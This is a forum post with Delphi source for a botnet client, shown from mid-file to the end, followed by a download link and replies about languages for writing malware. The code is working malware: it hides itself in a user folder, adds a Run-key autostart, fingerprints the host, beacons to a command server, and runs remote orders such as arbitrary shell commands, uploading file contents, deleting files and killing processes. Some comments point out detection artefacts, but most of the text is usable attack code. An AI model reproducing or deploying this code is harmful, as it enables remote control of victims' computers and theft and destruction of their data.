eventos[controla].ki.dwFlags := KEYEVENTF_UNICODE or KEYEVENTF_KEYUP;
eventos[controla].ki.time := 0;
eventos[controla].ki.dwExtraInfo := 0;
Inc(controla);
end;
SendInput(controla, eventos[0], SizeOf(TInput));
Result := code;
end;
function escribir_word(texto: string): string;
// Launches winword.exe through ShellExecute, waits a fixed five seconds and
// then calls SendKeys(texto). Nothing verifies that Word started or holds
// focus, so the text lands in whichever window is focused after the delay.
// Always returns '[?] Word Joke : OK'.
// Analyst note: winword.exe started by an unrelated, non-Office parent
// process is the visible process-tree trace of this command.
var
code: string;
begin
code := '';
code := '[?] Word Joke : OK';
ShellExecute(0, nil, PChar('winword.exe'), nil, nil, SW_SHOWNORMAL);
Sleep(5000);
SendKeys(texto);
Result := code;
end;
function cambiar_barra(opcion: string): string;
// Hides or shows the Windows taskbar by calling ShowWindow on the top-level
// window of class 'Shell_TrayWnd'. 'hide' hides it; any other value of
// `opcion` shows it again. Returns a status string; neither FindWindow nor
// ShowWindow is checked for failure.
var
code: string;
begin
code := '';
if (opcion = 'hide') then
begin
ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_HIDE);
code := '[?] Hidden Taskbar : OK';
end
else
begin
ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_SHOWNA);
code := '[?] Show Taskbar : OK';
end;
Result := code;
end;
function cambiar_iconos(opcion: string): string;
// Hides or shows the desktop icons: finds the 'ProgMan' window, takes its
// first child (GW_CHILD) and calls ShowWindow on it. 'hide' hides it; any
// other value of `opcion` shows it. Returns a status string; the window
// handles are used without checking that the lookups succeeded.
var
code: string;
acatoy: THandle;
begin
code := '';
acatoy := FindWindow('ProgMan', nil);
acatoy := GetWindow(acatoy, GW_CHILD);
if (opcion = 'hide') then
begin
ShowWindow(acatoy, SW_HIDE);
code := '[?] Hidden Icons : OK';
end
else
begin
ShowWindow(acatoy, SW_SHOW);
code := '[?] Show Icons : OK';
end;
Result := code;
end;
function listardirectorio(dir: string): string;
// Returns the names of the entries matched by `dir`\*.*, one per line, each
// prefixed with '[?] : '. Only names are reported (no sizes or attributes).
// NOTE(review): the FindFirst result is not checked, so a missing directory
// still appends one line built from an unfilled search record, and no
// FindClose call is visible in this function.
var
busqueda: TSearchRec;
code: string;
begin
code := '';
FindFirst(dir + '\*.*', faAnyFile + faDirectory + faReadOnly, busqueda);
code := code + '[?] : ' + busqueda.Name + sLineBreak;
while FindNext(busqueda) = 0 do
begin
code := code + '[?] : ' + busqueda.Name + sLineBreak;
end;
Result := code;
end;
function borraresto(archivo: string): string;
// Deletes the path `archivo`. A directory is removed with RemoveDir, which
// only succeeds on an empty directory; a file is removed with DeleteFile.
// Returns '[?] Directory removed', '[?] File removed' or '[?] Error'; when
// the path is neither an existing directory nor an existing file the result
// is an empty string.
var
code: string;
begin
code := '';
if DirectoryExists(archivo) then
begin
if (RemoveDir(archivo)) then
begin
code := '[?] Directory removed';
end
else
begin
code := '[?] Error';
end;
end;
if FileExists(archivo) then
begin
if (DeleteFile(PChar(archivo))) then
begin
code := '[?] File removed';
end
else
begin
code := '[?] Error';
end;
end;
Result := code;
end;
function matarproceso(pid: string): string;
// Terminates the process whose id is StrToInt(pid): opens it with only the
// PROCESS_TERMINATE right and calls TerminateProcess with exit code 0.
// Returns an OK/ERROR status string based on the TerminateProcess result.
// The OpenProcess handle is not checked before use and is not closed here;
// StrToInt raises on non-numeric input and no handler is visible.
var
vano: THandle;
code: string;
begin
code := '';
vano := OpenProcess(PROCESS_TERMINATE, FALSE, StrToInt(pid));
if TerminateProcess(vano, 0) then
begin
code := '[?] Kill Process : OK';
end
else
begin
code := '[?] Kill Process : ERROR';
end;
Result := code;
end;
function listarprocesos(): string;
// Enumerates running processes with a Toolhelp snapshot
// (TH32CS_SNAPPROCESS) and returns one line per process in the form
// '[?] Name : <exe>[?] PID : <pid>'. Only the executable name and process id
// are collected. The snapshot handle is not closed in this function.
var
conector: THandle;
timbre: LongBool;
indicio: TProcessEntry32;
code: string;
begin
code := '';
conector := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
// dwSize must be set before the first Process32First call.
indicio.dwSize := SizeOf(indicio);
timbre := Process32First(conector, indicio);
while timbre do
begin
code := code + '[?] Name : ' + indicio.szExeFile + '[?] PID : ' + IntToStr
(indicio.th32ProcessID) + sLineBreak;
timbre := Process32Next(conector, indicio);
end;
Result := code;
end;
function ejecutar(cmd: string): string;
// Credits : Function ejecutar() based in : http://www.delphidabbler.com/tips/61
// Thanks to www.delphidabbler.com
//
// Runs `cmd` through the command interpreter and returns its captured
// output. `cmd` is appended unmodified to 'cmd.exe /C ', the child is started
// with a hidden window (SW_HIDE), with stdout and stderr redirected into an
// anonymous pipe and 'c:/' as working directory; the parent then reads the
// pipe in chunks of up to 255 bytes until the read fails or returns 0 bytes.
// Returns an empty string when CreateProcess fails.
//
// Analyst note: the observable pattern is a windowless cmd.exe child with
// '/C' on its command line, inherited handles and redirected standard
// output, spawned by the stub process - a useful process-creation
// telemetry rule.
// NOTE(review): the read end of the pipe and the process/thread handles in
// parte3 are not closed in this function.
var
parte1: TSecurityAttributes;
parte2: TStartupInfo;
parte3: TProcessInformation;
parte4: THandle;
parte5: THandle;
control2: Boolean;
contez: array [0 .. 255] of AnsiChar;
notengoidea: Cardinal;
fix: Boolean;
code: string;
begin
code := '';
// Security attributes with bInheritHandle = True so the child can inherit
// the pipe handles.
with parte1 do
begin
nLength := SizeOf(parte1);
bInheritHandle := True;
lpSecurityDescriptor := nil;
end;
// parte4 = read end (kept by this process), parte5 = write end (given to
// the child as stdout/stderr).
CreatePipe(parte4, parte5, @parte1, 0);
with parte2 do
begin
FillChar(parte2, SizeOf(parte2), 0);
cb := SizeOf(parte2);
dwFlags := STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES;
wShowWindow := SW_HIDE;
hStdInput := GetStdHandle(STD_INPUT_HANDLE);
hStdOutput := parte5;
hStdError := parte5;
end;
fix := CreateProcess(nil, PChar('cmd.exe /C ' + cmd), nil, nil, True, 0, nil,
PChar('c:/'), parte2, parte3);
// Close this process's copy of the write end so ReadFile sees end-of-pipe
// once the child exits.
CloseHandle(parte5);
if fix then
repeat
begin
control2 := ReadFile(parte4, contez, 255, notengoidea, nil);
end;
if notengoidea > 0 then
begin
// Terminate the chunk so it can be appended as a string.
contez[notengoidea] := #0;
code := code + contez;
end;
until not(control2) or (notengoidea = 0);
Result := code;
end;
function leerdatos_sub(sub_1, sub_2, sub_3, sub_4: integer): DWORD;
// Packs four fields into one DWORD: sub_1 in bits 16 and up, sub_4 at bit 14,
// sub_2 at bit 2 and sub_3 in the low bits. This is the same bit layout as
// the Windows CTL_CODE macro (device type, access, function, method), and
// opencd() uses the result as the control code for DeviceIoControl.
begin
Result := sub_1 shl 16 or sub_4 shl 14 or sub_2 shl 2 or sub_3;
end;
function opencd(tipoh: string): string;
// Credits : Based on http://stackoverflow.com/questions/19894566/using-windows-and-mmsystem-in-delphi
// Thanks to Sertac Akyuz
//
// Opens ('open') or closes ('close') the tray of the optical drive by
// sending three device control codes to the volume '\\.\D:'. The drive
// letter D is hard-coded. Always returns '[?] CD : OK'; none of the API
// results are checked.
// With the constants below the three codes evaluate to $00090018, $00090020
// and $002D4808 / $002D480C, which appear to correspond to
// FSCTL_LOCK_VOLUME, FSCTL_DISMOUNT_VOLUME and IOCTL_STORAGE_EJECT_MEDIA /
// IOCTL_STORAGE_LOAD_MEDIA - confirm against the Windows SDK headers.
// NOTE(review): `opciondecd` stays unassigned when `tipoh` is neither 'open'
// nor 'close'.
const
const_uno = $00000009;
const_dos = $0000002D;
const_tres = 0;
const_cuatro = 0;
const_cinco = $0001;
const_seis = const_dos;
const_siete = 6;
const_ocho = 8;
var
var_uno: string;
var_dos: THandle;
var_tres: DWORD;
opciondecd: integer;
begin
if (tipoh = 'open') then
begin
opciondecd := $0202;
end;
if (tipoh = 'close') then
begin
opciondecd := $0203;
end;
var_uno := Format('\\.\%s:', ['D']);
var_dos := CreateFile(PChar(var_uno), GENERIC_READ, FILE_SHARE_WRITE, nil,
OPEN_EXISTING, 0, 0);
// Device type 9, function 6.
DeviceIoControl(var_dos, leerdatos_sub(const_uno, const_siete, const_tres,
const_cuatro), nil, 0, nil, 0, var_tres, nil);
// Device type 9, function 8.
DeviceIoControl(var_dos, leerdatos_sub(const_uno, const_ocho, const_tres,
const_cuatro), nil, 0, nil, 0, var_tres, nil);
// Device type $2D, function $0202 or $0203, access 1.
DeviceIoControl(var_dos, leerdatos_sub(const_seis, opciondecd, const_tres,
const_cinco), nil, 0, nil, 0, var_tres, nil);
CloseHandle(var_dos);
Result := '[?] CD : OK';
end;
//
// First Functions
function dhencode(texto, opcion: string): string;
// Thanks to Taqyon
// Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hex
//
// Hex codec selected by `opcion` (same routine as in the generator unit):
//   'encode' - each character of `texto` becomes IntToHex(ord(ch), 2);
//   'decode' - each pair of hex digits in `texto` becomes one character.
// Any other `opcion` returns an empty string.
//
// Analyst note: keyless hex encoding, not encryption. Anything stored in
// this form can be recovered from a sample by hex-decoding it.
var
num: integer;
aca: string;
cantidad: integer;
begin
num := 0;
Result := '';
aca := '';
cantidad := 0;
if (opcion = 'encode') then
begin
cantidad := Length(texto);
for num := 1 to cantidad do
begin
aca := IntToHex(ord(texto[num]), 2);
Result := Result + aca;
end;
end;
if (opcion = 'decode') then
begin
cantidad := Length(texto);
// A trailing odd digit is ignored because of the integer division.
for num := 1 to cantidad div 2 do
begin
// '$' prefix makes StrToInt parse the two-character slice as hexadecimal;
// a non-hex pair raises a conversion error that is not handled here.
aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2)));
Result := Result + aca;
end;
end;
end;
function regex(text: String; deaca: String; hastaaca: String): String;
// Despite the name this is not a regular expression: it returns the part of
// `text` between the first occurrence of `deaca` and the next occurrence of
// `hastaaca` that follows it, using plain substring search (AnsiPos).
// NOTE(review): neither marker is checked for presence. When `deaca` is
// absent AnsiPos returns 0 and only Length(deaca) - 1 leading characters are
// dropped; when `hastaaca` is absent SetLength receives -1.
begin
// Drop everything up to and including the start marker.
Delete(text, 1, AnsiPos(deaca, text) + Length(deaca) - 1);
// Cut at the end marker.
SetLength(text, AnsiPos(hastaaca, text) - 1);
Result := text;
end;
function partirdoc(Url: string): string;
// Reduces a URL to what follows the host: removes the host name (the text
// between '://' and the next '/') and then the 'http://' / 'https://'
// prefix. tomar() passes the result to HttpOpenRequest as the object name.
// Because rfReplaceAll is used, every occurrence of the host string inside
// the URL is removed, not only the first. `chauhost` is declared but unused.
var
chauhost: string;
begin
Url := StringReplace(Url, regex(Url, '://', '/'), '', [rfReplaceAll,
rfIgnoreCase]);
Url := StringReplace(Url, 'http://', '', [rfReplaceAll, rfIgnoreCase]);
Url := StringReplace(Url, 'https://', '', [rfReplaceAll, rfIgnoreCase]);
Result := Url;
end;
function getfilename(Url: string): string;
// Credits : Based on http://delphi-kb.blogspot.com.ar/2009/12/extract-filename-from-url.html
// Thanks to NM
//
// Returns the last path segment of `Url`: forward slashes are turned into
// backslashes so that ExtractFileName can be applied. Query strings are not
// stripped, so they stay part of the returned name.
var
resultado: string;
begin
resultado := StringReplace(Url, '/', '\', [rfReplaceAll]);
resultado := ExtractFileName(resultado);
Result := resultado;
end;
function toma(const pagina: string): UTF8String;
// Credits : Based on http://www.scalabium.com/faq/dct0080.htm
// Thanks to www.scalabium.com
//
// HTTP GET of `pagina` through WinINet (InternetOpenUrl with
// INTERNET_FLAG_RELOAD), read in 1024-byte chunks and returned as one
// string. The system proxy configuration is used
// (INTERNET_OPEN_TYPE_PRECONFIG). No WinINet return value is checked and any
// exception is swallowed, in which case the result may be empty or partial.
//
// Analyst note: the User-Agent is a fixed string imitating Firefox 2.0.0.12
// on Windows XP; as written here it has no space between 'Gecko/20080201'
// and 'Firefox/2.0.0.12', which makes it a distinctive value to match in
// proxy or web-server logs.
var
nave1: HINTERNET;
nave2: HINTERNET;
tou: DWORD;
codez: UTF8String;
codee: array [0 .. 1023] of byte;
finalfinal: string;
begin
try
begin
finalfinal := '';
Result := '';
nave1 := InternetOpen(
'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12'
, INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
nave2 := InternetOpenUrl(nave1, PChar(pagina), nil, 0,
INTERNET_FLAG_RELOAD, 0);
repeat
begin
InternetReadFile(nave2, @codee, SizeOf(codee), tou);
// Copy exactly `tou` bytes of this chunk before appending.
SetString(codez, PAnsiChar(@codee[0]), tou);
finalfinal := finalfinal + codez;
end;
until tou = 0;
InternetCloseHandle(nave2);
InternetCloseHandle(nave1);
Result := finalfinal;
end;
except
// Exceptions are swallowed; the handles opened above are not closed on
// this path.
end;
end;
function tomar(pagina: string; postdata: AnsiString): string;
// Credits : Based on : http://tulisanlain.blogspot.com.ar/2012/10/how-to-send-http-post-request-in-delphi.html
// Thanks to Tulisan Lain
//
// HTTP POST of `postdata` to `pagina` through WinINet and return of the
// response body. The host is taken from `pagina` with regex() and the
// object path with partirdoc(). The connection always uses
// INTERNET_DEFAULT_HTTP_PORT and no secure flag is passed to
// HttpOpenRequest, so the request is sent as plain HTTP whatever scheme
// `pagina` carries. No WinINet return value is checked and any exception is
// swallowed.
//
// Analyst note: requests carry the same fixed Firefox 2.0.0.12 User-Agent as
// toma() (no space between 'Gecko/20080201' and 'Firefox/2.0.0.12'), the
// header 'Content-Type: application/x-www-form-urlencoded' and an
// unencrypted body, so the traffic can be inspected and matched on the wire.
const
accept: packed array [0 .. 1] of LPWSTR = (PChar('*/*'), nil);
var
nave3: HINTERNET;
nave4: HINTERNET;
nave5: HINTERNET;
todod: array [0 .. 1023] of AnsiChar;
numberz: Cardinal;
numberzzz: Cardinal;
finalfinalfinalfinal: string;
begin
try
begin
finalfinalfinalfinal := '';
Result := '';
nave3 := InternetOpen(PChar(
'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12')
, INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
nave4 := InternetConnect(nave3, PChar(regex(pagina, '://', '/')),
INTERNET_DEFAULT_HTTP_PORT, nil, nil, INTERNET_SERVICE_HTTP, 0, 1);
nave5 := HttpOpenRequest(nave4, PChar('POST'), PChar(partirdoc(pagina)),
nil, nil, @accept, 0, 1);
HttpSendRequest(nave5, PChar(
'Content-Type: application/x-www-form-urlencoded'), Length
('Content-Type: application/x-www-form-urlencoded'), PChar(postdata),
Length(postdata));
repeat
begin
InternetReadFile(nave5, @todod, SizeOf(todod), numberzzz);
// This append to Result has no lasting effect: Result is overwritten
// with finalfinalfinalfinal after the loop.
if numberzzz = SizeOf(todod) then
begin
Result := Result + AnsiString(todod);
end;
// The response is accumulated byte by byte here.
if numberzzz > 0 then
for numberz := 0 to numberzzz - 1 do
begin
finalfinalfinalfinal := finalfinalfinalfinal + todod[numberz];
end;
end;
until numberzzz = 0;
InternetCloseHandle(nave3);
InternetCloseHandle(nave4);
InternetCloseHandle(nave5);
Result := finalfinalfinalfinal;
end;
except
// Exceptions are swallowed; the handles opened above are not closed on
// this path.
end;
end;
function dh_generate(cantidad: integer): string;
// Purpose: build a string of `cantidad` characters, each drawn from A-Z, a-z or 0-9.
// The main program calls this with 5 (after Randomize) to create the per-host
// identifier stored in the file 'key', so the identifier sent to the server is
// five alphanumeric characters.
// Uses the RTL Random function, which is a general-purpose pseudo-random
// generator, not a cryptographic one.
const
opciones: array [1 .. 3] of string = ('mayus', 'minus', 'numbers');
var
aleatorio: integer;
iz: integer;
var
finalr: string;
begin
finalr := '';
for iz := 1 to cantidad do
begin
// Random(3) + 1 gives an index 1..3 into `opciones`, selecting the character class.
aleatorio := Random(4 - 1) + 1;
if (opciones[aleatorio] = 'mayus') then
begin
// upper-case letter
finalr := finalr + Chr(ord('A') + Random(26));
end;
if (opciones[aleatorio] = 'minus') then
begin
// lower-case letter
finalr := finalr + Chr(ord('a') + Random(26));
end;
if (opciones[aleatorio] = 'numbers') then
begin
// decimal digit
finalr := finalr + Chr(ord('0') + Random(10));
end;
end;
Result := finalr;
end;
procedure savefile(filename, texto: string);
// Purpose: write `texto` followed by a line break to `filename`, appending when
// the file already exists and creating it otherwise.
// In this excerpt its only caller is the main program, which uses it to
// persist the generated identifier in the file 'key'.
// No I/O errors are handled here; a failure raises to the caller.
var
ar: TextFile;
begin
AssignFile(ar, filename);
// Sets the global FileMode variable (affects the whole process, not just this call).
FileMode := fmOpenWrite;
if FileExists(filename) then
Append(ar)
else
Rewrite(ar);
Writeln(ar, texto);
CloseFile(ar);
end;
function leerarchivo(rutadelarchivo: string): string;
// Purpose: open `rutadelarchivo` read-only with the Win32 file API and return
// buffer contents as a string.
// Callers in this excerpt: getmydata (reads the local 'key' file) and the
// 'OpenFile' order in the main loop, where the path comes from the server and
// the returned text is uploaded - i.e. this is the file-read primitive of the client.
// Behaviour as written: every read goes into the same $8000-byte buffer and the
// loop keeps reading until a read reports zero bytes, so only whatever the buffer
// holds after the last read is returned, not the concatenation of all chunks.
// NOTE(review): the buffer-to-string conversion presumably stops at the first
// #0 byte, so binary files would be cut short - confirm.
const
cantidad_buffer = $8000;
var
fun_uno: LongWord;
fun_dos: THandle;
fun_tres: array [0 .. cantidad_buffer - 1] of AnsiChar;
begin
fun_tres := '';
// Opened with read+write sharing, so files in use by other processes can
// still be read. The handle is not compared with INVALID_HANDLE_VALUE.
fun_dos := CreateFile(PChar(rutadelarchivo), GENERIC_READ,
FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING,
FILE_ATTRIBUTE_READONLY, 0);
SetFilePointer(fun_dos, 0, nil, FILE_BEGIN);
ReadFile(fun_dos, fun_tres, cantidad_buffer, fun_uno, nil);
// Each iteration overwrites the buffer from its start.
while (fun_uno > 0) do
begin
ReadFile(fun_dos, fun_tres, cantidad_buffer, fun_uno, nil);
end;
CloseHandle(fun_dos);
Result := fun_tres;
end;
function getmydata(): string;
// Purpose: collect the host profile that is later sent to the server at
// check-in and return it as one tagged string:
//   [key]..[key][ip]..[ip][pais]..[pais][user]..[user][os]..[os]
// Sources of each field:
//   key  - contents of the local file 'key' with line breaks removed
//   ip   - scraped from the HTML of http://whatismyipaddress.com/
//   pais - country, scraped from the same page
//   user - environment variable 'username'
//   os   - environment variable 'os'
// Detection note: an outbound request to whatismyipaddress.com with this
// client's User-Agent precedes the first check-in.
// NOTE(review): toma() and regex() are defined outside this excerpt; toma()
// appears to be an HTTP GET helper and regex() a between-two-delimiters
// extractor - confirm against their definitions.
var
consegui_key, consegui_ip, consegui_pais, consegui_user, consegui_os: string;
codigo_de_pagina: string;
begin
consegui_key := leerarchivo('key');
consegui_key := StringReplace(consegui_key, sLineBreak, '',
[rfReplaceAll, rfIgnoreCase]);
codigo_de_pagina := toma('http://whatismyipaddress.com/');
// The extraction depends on the exact markup of the third-party page.
consegui_ip := regex(codigo_de_pagina, 'alt="Click for more about ',
'"></a>');
consegui_pais := regex(codigo_de_pagina, '<tr><th>Country:</th><td>',
'</td></tr>');
// '?' is reported when a field could not be extracted.
if (consegui_ip = '') then
begin
consegui_ip := '?';
end;
if (consegui_pais = '') then
begin
consegui_pais := '?';
end;
consegui_user := GetEnvironmentVariable('username');
consegui_os := GetEnvironmentVariable('os');
Result := '[key]' + consegui_key + '[key]' + '[ip]' + consegui_ip + '[ip]' +
'[pais]' + consegui_pais + '[pais]' + '[user]' + consegui_user + '[user]' +
'[os]' + consegui_os + '[os]';
end;
procedure saludo;
// Purpose: initial check-in. POSTs the host profile to url_master and
// discards the response.
// Request-body signature: starts with 'entradatrasera=hidad&key=' followed by
// the ip, pais, username, os and timeout parameters.
// The values are concatenated as-is, with no encoding visible here.
begin
tomar(url_master,
'entradatrasera=hidad&key=' + clave + '&ip=' + ip + '&pais=' + pais +
'&username=' + user + '&os=' + os + '&timeout=' + time);
end;
procedure sigo_vivo;
// Purpose: heartbeat. POSTs 'sigovivo=alpedo&clavenow=<key>' to url_master and
// discards the response. The main loop calls it once per polling interval, so
// it shows up as a regular beacon to the same URL.
begin
tomar(url_master, 'sigovivo=alpedo&clavenow=' + clave);
end;
function ver_ordenes(): string;
// Purpose: poll url_master for a pending order and return it as a tagged string:
//   [comando]..[comando][arg1]..[arg1][arg2]..[arg2][arg3]..[arg3]
// Request body: 'ordenespabots=alpedo&clave=<key>'.
// The response is expected to contain lines of the form
//   '[+] Orden : <name><br>', '[+] Arg1 : ...<br>', '[+] Arg2 : ...<br>', '[+] Arg3 : ...<br>'
// which makes the server-to-client direction recognisable in captured traffic.
// The raw response is also stored in the unit-level variable `code`.
// NOTE(review): no integrity or authenticity check on the response is visible
// in this excerpt.
var
re_cmd, arg1, arg2, arg3: string;
begin
code := tomar(url_master, 'ordenespabots=alpedo&clave=' + clave);
re_cmd := regex(code, '[+] Orden : ', '<br>');
arg1 := regex(code, '[+] Arg1 : ', '<br>');
arg2 := regex(code, '[+] Arg2 : ', '<br>');
arg3 := regex(code, '[+] Arg3 : ', '<br>');
Result := '[comando]' + re_cmd + '[comando]' + '[arg1]' + arg1 + '[arg1]' +
'[arg2]' + arg2 + '[arg2]' + '[arg3]' + arg3 + '[arg3]';
end;
procedure mandar_rta(contenido: string);
// Purpose: upload the result of an executed order. POSTs
// 'mandocarajo=alpedo&miclave=<key>&mirta=<contenido>' to url_master and
// discards the response.
// `contenido` is whatever the order handler returned (command output, process
// or directory listings, file contents), so this request is the point where
// host data leaves the machine.
begin
tomar(url_master,
'mandocarajo=alpedo&miclave=' + clave + '&mirta=' + contenido);
end;
// Program entry point. In order, the code below:
//   1. reads its configuration from the tail of its own executable;
//   2. relocates itself to a hidden folder and registers a Run-key autostart;
//   3. creates a per-host identifier on first run and checks in;
//   4. loops forever: sleep, heartbeat, poll for an order, dispatch, upload the result.
// Host artifacts visible in this block (useful for triage and detection):
//   - folder  %USERPROFILE%/ratatax  with the hidden attribute set
//   - the executable moved into that folder, also hidden
//   - file 'key' inside that folder (the process changes directory into it)
//   - registry value 'uberkk' under
//     HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
//   - the literal marker '[63686175]' near the end of the binary
// None of the Win32 return values in the setup phase are checked.
begin
ob := INVALID_HANDLE_VALUE;
code := '';
// Read up to the last 9999 bytes of the running executable (paramstr(0)).
ob := CreateFile(PChar(paramstr(0)), GENERIC_READ, FILE_SHARE_READ, nil,
OPEN_EXISTING, 0, 0);
if (ob <> INVALID_HANDLE_VALUE) then
begin
SetFilePointer(ob, -9999, nil, FILE_END);
ReadFile(ob, codex, 9999, nose, nil);
CloseHandle(ob);
end;
// The configuration sits between two '[63686175]' markers and is passed through
// dhencode(..., 'decode') before the [url] and [time] fields are extracted.
// NOTE(review): dhencode() is defined outside this excerpt; its encoding is
// not visible here.
todo := regex(codex, '[63686175]', '[63686175]');
todo := dhencode(todo, 'decode');
url_master := regex(todo, '[url]', '[url]');
time := regex(todo, '[time]', '[time]');
// url_master := 'http://localhost/botnet/';
// time := '5';
try
// Install location: %USERPROFILE%/ratatax/
dir_hide := GetEnvironmentVariable('USERPROFILE') + '/';
carpeta := 'ratatax';
dir := dir_hide + carpeta + '/';
if not(DirectoryExists(dir)) then
begin
CreateDir(dir);
end;
ChDir(dir);
nombrereal := ExtractFileName(paramstr(0));
rutareal := dir;
yalisto := dir + nombrereal;
// Move the running image into the install folder and hide both folder and file.
MoveFile(PChar(paramstr(0)), PChar(yalisto));
SetFileAttributes(PChar(dir), FILE_ATTRIBUTE_HIDDEN);
SetFileAttributes(PChar(yalisto), FILE_ATTRIBUTE_HIDDEN);
// Persistence: HKLM Run value 'uberkk' pointing at the relocated executable.
// The data length passed is the literal 666 rather than the length of the path.
// NOTE(review): the stored value may therefore carry bytes beyond the path - confirm.
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
'Software\Microsoft\Windows\CurrentVersion\Run\', 0, nil,
REG_OPTION_NON_VOLATILE, KEY_WRITE, nil, registro, nil);
RegSetValueEx(registro, 'uberkk', 0, REG_SZ, PChar(yalisto), 666);
RegCloseKey(registro);
// First run only: generate and store the 5-character host identifier.
if not(FileExists('key')) then
begin
Randomize;
savefile('key', dh_generate(5));
end;
// Build the host profile and split it back into the unit-level variables
// used by the request helpers.
datos := getmydata();
clave := regex(datos, '[key]', '[key]');
ip := regex(datos, '[ip]', '[ip]');
pais := regex(datos, '[pais]', '[pais]');
user := regex(datos, '[user]', '[user]');
os := regex(datos, '[os]', '[os]');
// Writeln('[+] Clave : ' + clave);
// Writeln('[+] IP : ' + ip);
// Writeln('[+] Pais : ' + pais);
// Writeln('[+] Username : ' + user);
// Writeln('[+] OS : ' + os);
// Initial check-in.
saludo;
// Writeln('');
// Writeln('[+] Iniciando bucle');
// Polling loop: the interval in seconds comes from the embedded [time] field,
// so beacon timing is fixed per build.
while (True) do
begin
Sleep(StrToInt(time) * 1000);
sigo_vivo;
ordenes_re := ver_ordenes;
ordenes_cmd := regex(ordenes_re, '[comando]', '[comando]');
ordenes_ar1 := regex(ordenes_re, '[arg1]', '[arg1]');
ordenes_ar2 := regex(ordenes_re, '[arg2]', '[arg2]');
ordenes_ar3 := regex(ordenes_re, '[arg3]', '[arg3]');
// Writeln('');
// Writeln('[+] orden : ' + ordenes_cmd);
// Writeln('[+] ar1 : ' + ordenes_ar1);
// Writeln('[+] ar2 : ' + ordenes_ar2);
// Writeln('[+] ar3 : ' + ordenes_ar3);
// Order dispatch. Each handler's return value is uploaded with mandar_rta.
// Only arg1 is consumed by the handlers below; arg2 and arg3 are parsed but
// not used in this block. Server-supplied arguments reach the handlers with
// no validation visible here. The handlers themselves (ejecutar,
// listarprocesos, matarproceso, ...) are defined outside this excerpt.
if (ordenes_cmd = 'CMD') then
begin
mandar_rta(ejecutar(ordenes_ar1));
end;
if (ordenes_cmd = 'GetProcess') then
begin
mandar_rta(listarprocesos());
end;
if (ordenes_cmd = 'KillProcess') then
begin
mandar_rta(matarproceso(ordenes_ar1));
end;
if (ordenes_cmd = 'ListDir') then
begin
mandar_rta(listardirectorio(ordenes_ar1));
end;
if (ordenes_cmd = 'Delete') then
begin
mandar_rta(borraresto(ordenes_ar1));
end;
if (ordenes_cmd = 'OpenFile') then
begin
mandar_rta(leerarchivo(ordenes_ar1));
end;
if (ordenes_cmd = 'OpenCD') then
begin
mandar_rta(opencd('open'));
end;
if (ordenes_cmd = 'CloseCD') then
begin
mandar_rta(opencd('close'));
end;
if (ordenes_cmd = 'HideIcons') then
begin
mandar_rta(cambiar_iconos('hide'));
end;
if (ordenes_cmd = 'ShowIcons') then
begin
mandar_rta(cambiar_iconos('mostrar'));
end;
if (ordenes_cmd = 'HideTaskbar') then
begin
mandar_rta(cambiar_barra('hide'));
end;
if (ordenes_cmd = 'ShowTaskbar') then
begin
mandar_rta(cambiar_barra('mostrar'));
end;
if (ordenes_cmd = 'SendKeys') then
begin
mandar_rta(SendKeys(ordenes_ar1));
end;
if (ordenes_cmd = 'OpenWord') then
begin
mandar_rta(escribir_word(ordenes_ar1));
end;
if (ordenes_cmd = 'CrazyMouse') then
begin
mandar_rta(crazy_mouse(ordenes_ar1));
end;
end;
except
begin
// Any exception raised during setup or inside the loop ends up here and
// is discarded; the program then terminates without reporting anything.
//
end;
end;
end.
// The End ?
Available for download here (http://sourceforge.net/projects/dhbotnet/).
-
First, botnets are lame!
Second, I can't really see how it can be beneficial to code something like this in Delphi. Even though languages have a wide range of uses, languages such as Python, Pascal and Delphi are not good for malware.
-
Python, Pascal and Delphi are not good for malware.
You fo real? Python is ofc not suitable, but Pascal and Delphi are more than suitable. There are MANY malware samples written in Pascal and Delphi, including that one special ATM keylogger that was designed to log CC data upon card insertion.
-
@Doddy - You seem to be a very good Delphi programmer. I've also seen you post other decent malicious programs in Perl and PHP. How come you haven't bothered to post an intro, or made any other posts for that matter? All I've seen from you is various botnets and RATs and whatnot.
-
You can write malware in any compiled language, for the most part. Some choices are not necessarily good, however.